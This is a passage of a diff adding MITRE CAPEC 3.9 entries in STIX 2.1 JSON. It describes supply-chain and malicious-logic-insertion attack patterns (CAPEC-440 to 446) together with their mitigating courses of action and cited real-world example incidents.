"course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Static code analysis", + "id": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb1919fb-3b75-486e-9e5c-c0319ac4b906", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes", + "id": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Keep software patched to ensure that known vulnerabilities are not available for adversaries to target on host.", + "id": "course-of-action--6562497d-b76d-498e-9fd1-7c599daf2346", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec25c76a-d742-49a3-bd1e-bff659d7f1fe", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6562497d-b76d-498e-9fd1-7c599daf2346", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-440", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/440.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Hardware Additions", + "external_id": "T1200", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1200" + } + ], + "id": "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Integrity Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_prerequisites": [ + "Influence over the deployed system at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_prerequisites": [ + "Access to the component currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-442", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/442.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Marshall Brain, How Computer Viruses Work, 2007, MindPride", + "external_id": "REF-387", + "source_name": "reference_from_CAPEC", + "url": "http://www.mindpride.net/root/Extras/how-stuff-works/how_computer_viruses_work.htm" + } + ], + "id": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c" + ], + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect and quarantine software with known virus.", + "id": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-442-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses their privileged position within an authorized development organization to inject malicious logic into a codebase or product.", + "external_references": [ + { + "external_id": "CAPEC-443", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/443.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Ax Sharma, Dev corrupts NPM libs 'colors' and 'faker' breaking thousands of apps, 2022--01---09, BleepingComputer", + "external_id": "REF-704", + "source_name": "reference_from_CAPEC", + "url": "https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/" + }, + { + "description": "Alberto Pellitteri, Malicious modifications to open source projects affecting thousands, 2022--01---12, SysDig", + "external_id": "REF-705", + "source_name": "reference_from_CAPEC", + "url": "https://sysdig.com/blog/malicious-modifications-detection-sysdig/" + } + ], + "id": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Inserted Into Product by Authorized Developer", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In January 2022 the author of popular JavaScript packages \"Faker\" and \"colors\", used for generating mock data and including colored text within NodeJS consoles respectively, introduced malicious code that resulted in a Denial of Service (DoS) via an infinite loop. When applications that leveraged these packages updated to the malicious version, their applications executed the infinite loop and output gibberish ASCI characters endlessly. This resulted in the application being unusable until a stable version of the package was obtained. [REF-705]\n ", + "During initial development, an authorized hardware developer implants a malicious microcontroller within an Internet of Things (IOT) device and programs the microcontroller to communicate with the vulnerable device. Each time the device initializes, the malicious microcontroller's code is executed, which ultimately provides the adversary with backdoor access to the vulnerable device. This can further allow the adversary to sniff network traffic, exfiltrate date, execute unauthorized commands, and/or pivot to other vulnerable devices." + ], + "x_capec_extended_description": "\n Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In further cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and hardware during development and prior to deployment to ensure that it functions as intended and without any malicious functionality. This includes both initial development, as well as updates propagated to the product after deployment.", + "id": "course-of-action--959db216-95a2-4c6c-abbb-16795259ad74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-443-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f5aad68-5c68-4086-b215-b6715a590d4b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--959db216-95a2-4c6c-abbb-16795259ad74", + "spec_version": "2.1", + "target_ref": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system's software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. The product is then delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-444", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/444.html" + } + ], + "id": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Development Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb" + ], + "x_capec_prerequisites": [ + "Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-444-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f05e05a-2eec-4147-a5b0-18b6c29ec5da", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "spec_version": "2.1", + "target_ref": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an adversary can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server.\n ", + "external_references": [ + { + "external_id": "CAPEC-445", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/445.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Chef Manage deserializes cookie data insecurely, 2016--05---17, Carnegie Mellon University", + "external_id": "REF-706", + "source_name": "reference_from_CAPEC", + "url": "https://www.kb.cert.org/vuls/id/586503" + } + ], + "id": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product Software via Configuration Management Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2016, the policy-based configuration management system Chef was shown to be vulnerable to remote code execution attacks based on its Chef Manage add-on improperly deserializing user-driven cookie data. This allowed unauthenticated users the ability to craft cookie data that executed arbitrary code with the web server's privileges. [REF-706]\n " + ], + "x_capec_extended_description": "\n Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the configuration management system during deployment or currently deployed at a victim location. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.", + "id": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-445-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b2e787f-2034-4a16-8515-37dddac4930a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "spec_version": "2.1", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e626d148-d65c-4d3a-b600-e59852d41f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary conducts supply chain attacks by the inclusion of insecure third-party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer.\n ", + "external_references": [ + { + "external_id": "CAPEC-446", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/446.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Thomas Brewster, How Lenovo's Superfish 'Malware' Works And What You Can Do To Kill It, 2015--02---19, Forbes", + "external_id": "REF-707", + "source_name": "reference_from_CAPEC", + "url": "https://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/?sh=991ab8c38776" + }, + { + "description": "Dan Goodin, Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections, 2015--02---19, Ars Technica", + "external_id": "REF-708", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections/" + }, + { + "description": "Rob Graham, Extracting the SuperFish certificate, 2015--02---19, Errata Security", + "external_id": "REF-709", + "source_name": "reference_from_CAPEC", + "url": "https://blog.erratasec.com/2015/02/extracting-superfish-certificate.html#.VOX5Ky57RqE" + }, + { + "description": "Jordan Robertson, Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product via Inclusion of Third-Party Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n From mid-2014 to early 2015, Lenovo computers were shipped with the Superfish Visual Search software that ultimately functioned as adware on the system. The Visual Search installation included a self-signed root HTTPS certificate that was able to intercept encrypted traffic for any site visited by the user. Of more concern was the fact that the certificate's corresponding private key was the same for every Lenovo machine. Once the private key was discovered [REF-709], an adversary could then conduct an Adversary-in-the-Middle (AitM) attack that would go undetected by machines that had this certificate installed on it. Adversaries could then masquerade as legitimate entities such as financial institutions, popular corporations, or other secure destinations on the Internet. [REF-708]\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_extended_description": "\n The result is a window of opportunity for exploiting the product until the insecure component is discovered. This supply chain threat can result in the installation of malicious software or hardware that introduces widespread security vulnerabilities within an organization. Additionally, because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing Commercial off the Shelf (COTS) or Open Source Software (OSS) software that comes pre-packaged with the components required for it to operate. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development. This access is often obtained via insider access to include the third-party component after deployment." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6a471245-bafa-4239-b3da-e58e7488d129", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--959db216-95a2-4c6c-abbb-16795259ad74", + "spec_version": "2.1", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Don't assume popular third-party components are free from malware or vulnerabilities. For software, assess for malicious functionality via update/commit reviews or automated static/dynamic analysis prior to including the component within the application and deploying in a production environment.", + "id": "course-of-action--1b041562-6f87-4aa3-94d2-6cc9b68a540f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-446-1", + 